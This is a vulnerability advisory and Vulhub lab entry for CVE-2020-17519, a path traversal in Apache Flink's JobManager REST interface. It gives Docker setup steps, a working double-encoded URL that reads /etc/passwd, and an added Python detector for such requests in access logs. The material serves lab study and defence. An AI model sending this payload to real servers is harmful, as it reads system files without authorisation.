CVE-2020-17519

7.5 / 10
HIGH

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process. Access is restricted to files accessible by the JobManager process. All users should upgrade to Flink 1.11.3 or 1.12.0 if their Flink instance(s) are exposed. The issue was fixed in commit b561010b0ee741543c3953306037f00d7a9f0801 from apache/flink:master.

Weakness: Files or Directories Accessible to External Parties

The product makes files or directories accessible to unauthorized actors, even though they should not be.

Published: 2021-01-05

CVE-2020-17519 Vulnerable Docker Environment

Vulhub is an open-source collection of Dockerized vulnerable environments. No pre-existing knowledge of Docker is required; just execute two simple commands and you have a vulnerable environment.

Apache Flink jobmanager/logs Path Traversal (CVE-2020-17519)

Apache Flink is an open source stream processing framework with powerful stream- and batch-processing capabilities.

A change introduced in Apache Flink 1.11.0 (and released in 1.11.1 and 1.11.2 as well) allows attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.

References:

  • https://github.com/apache/flink/commit/b561010b0ee741543c3953306037f00d7a9f0801
  • https://nvd.nist.gov/vuln/detail/CVE-2020-17519

Environment Setup

Execute the following command to start an Apache Flink 1.11.2 JobManager:

docker-compose up -d

After Apache Flink has started, visit http://your-ip:8081 to view the homepage.

Exploit

Disclose /etc/passwd:

http://your-ip:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
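A detection sketch for the double-encoded request shown above, added here as an example that is not part of the original advisory, Vulhub or Flink: it percent-decodes the requested log name until it stops changing and flags anything that is not a plain file name. The access-log format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

LOG_PREFIX = "/jobmanager/logs/"  # endpoint taken from the URL above
MAX_ROUNDS = 5                    # bound the work on deeply nested encodings
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')

# Constructed reverse-proxy access-log lines; status codes and sizes are arbitrary.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Jan/2021:10:00:01 +0000] "GET /jobmanager/logs/flink-jobmanager.log HTTP/1.1" 200 5120
10.0.0.9 - - [05/Jan/2021:10:00:07 +0000] "GET /jobmanager/logs/..%252f..%252f..%252fetc%252fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [05/Jan/2021:10:00:09 +0000] "GET /jobmanager/logs/..%2f..%2fetc%2fpasswd HTTP/1.1" 200 0
10.0.0.5 - - [05/Jan/2021:10:00:12 +0000] "GET /jobs/overview HTTP/1.1" 200 310
"""


def fully_decode(value: str) -> str:
    """Percent-decode repeatedly so %252f -> %2f -> / is seen as a slash."""
    for _ in range(MAX_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_suspicious(request_target: str) -> bool:
    """True if a request to the log endpoint names anything but a plain file."""
    path = urlsplit(request_target).path  # urlsplit leaves the path encoded
    if not path.startswith(LOG_PREFIX):
        return False
    name = fully_decode(path[len(LOG_PREFIX):])
    # A legitimate log name is a single segment: no separators, no NUL,
    # and not a bare current/parent directory reference.
    return any(c in name for c in "/\\\x00") or name in {".", ".."}


def scan(log_text: str) -> list[str]:
    """Return 'client request-target' for every flagged line."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append(f"{line.split()[0]} {match.group(1)}")
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT", hit)
```

A single decoding pass would miss the `%252f` form, which is why the check decodes to a fixed point before looking for separators.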
